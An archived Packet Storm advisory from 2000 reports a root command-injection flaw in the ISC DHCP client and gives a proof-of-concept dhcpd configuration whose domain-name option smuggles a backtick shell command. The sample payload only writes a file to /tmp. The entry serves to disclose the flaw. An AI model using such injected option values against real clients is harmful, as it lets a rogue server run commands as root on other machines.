isc-dhcpd.exploit.txt

2000-06-27T00:00:00
ID PACKETSTORM:22231
Type packetstorm
Reporter Todd T. Fries
Modified 2000-06-27T00:00:00

Description

                                        
                                            `Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP  
client.  
  
I can confirm that as of 6:23am on June 23rd after several hours of  
hacking around the sources I had the following dhcpd config running on my  
own machine's private network for testing:  
  
shared-network LOCAL-NET {  
option domain-name "my.`echo hi > /tmp/oops`.domain";  
option domain-name-servers 192.168.1.3, 192.168.1.5;  
  
subnet 192.168.1.0 netmask 255.255.255.0 {  
option routers 192.168.1.1;  
  
range 192.168.1.32 192.168.1.127;  
}  
}  
  
... and when dhclient finished running I had a nice little present  
in /tmp/ named 'oops' that contained the string 'hi' ..  
  
`